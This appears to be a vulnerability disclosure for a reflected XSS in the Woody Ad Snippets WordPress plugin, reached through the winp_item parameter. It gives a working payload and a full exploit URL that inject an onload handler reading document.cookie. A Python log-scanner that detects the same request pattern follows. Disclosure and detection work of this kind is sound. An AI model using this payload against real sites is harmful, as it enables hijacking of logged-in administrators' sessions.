Business Details:

Vendor: Webcraftic
Plugin: Woody Ad Snippets
CMS: WordPress
Active Installations: +90k

Downloads: +677k

Technical Details:

Bug Type: Reflected XSS
Severity: Medium 

Affected Parameter: winp_item
Affected Path: https://[WEBSITE]/wp-admin/post-new.php


Used Payload:

phpl159r%22+onload%3Dalert%28document.cookie%29+be0bpc32ao+onload%3Dalert%281%29+zqg

Full Link:

http://[WEBSITE]/wp-admin/post-new.php?post_type=wbcr-snippets&winp_item=phpl159r%22+onload%3Dalert%28document.cookie%29+be0bpc32ao+onload%3Dalert%281%29+zqggm
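
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web-server access-log lines for requests to post-new.php whose decoded winp_item value contains a quote, an angle bracket or an inline event handler. The log lines are constructed; the combined log format, the function names and the benign value `php` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# A snippet-type value has no reason to contain quotes, angle brackets or an
# inline event handler (on...=); the advisory's payload uses a double quote
# followed by onload=.
SUSPICIOUS = re.compile(r'["\'<>]|\bon[a-z]+\s*=', re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (assumed combined log format, documentation IPs).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2020:10:00:00 +0000] "GET /wp-admin/post-new.php'
    '?post_type=wbcr-snippets&winp_item=php HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2020:10:00:05 +0000] "GET /wp-admin/post-new.php'
    '?post_type=wbcr-snippets&winp_item=phpl159r%22+onload%3Dalert%28document'
    '.cookie%29+be0bpc32ao+onload%3Dalert%281%29+zqggm HTTP/1.1" 200 5300',
    '203.0.113.7 - - [01/Jan/2020:10:00:09 +0000] "GET /wp-admin/edit.php'
    '?s=%22quoted+search%22 HTTP/1.1" 200 4100',
]

def check_request(target):
    """Return the decoded winp_item value if it looks like markup injection
    aimed at wp-admin/post-new.php, otherwise None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/post-new.php"):
        return None
    # parse_qs percent-decodes and turns '+' into a space, so the regex sees
    # the value the way the page would reflect it.
    params = parse_qs(parts.query, keep_blank_values=True)
    for value in params.get("winp_item", []):
        if SUSPICIOUS.search(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_value) for every flagged log line."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        if match:
            value = check_request(match.group(1))
            if value is not None:
                hits.append((line.split()[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}: suspicious winp_item -> {value!r}")
```

Because the affected path is under wp-admin, a hit means a logged-in user's browser followed such a link, so the client IP identifies the targeted user rather than the sender of the link.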

Proof of Concept:
YouTube Video
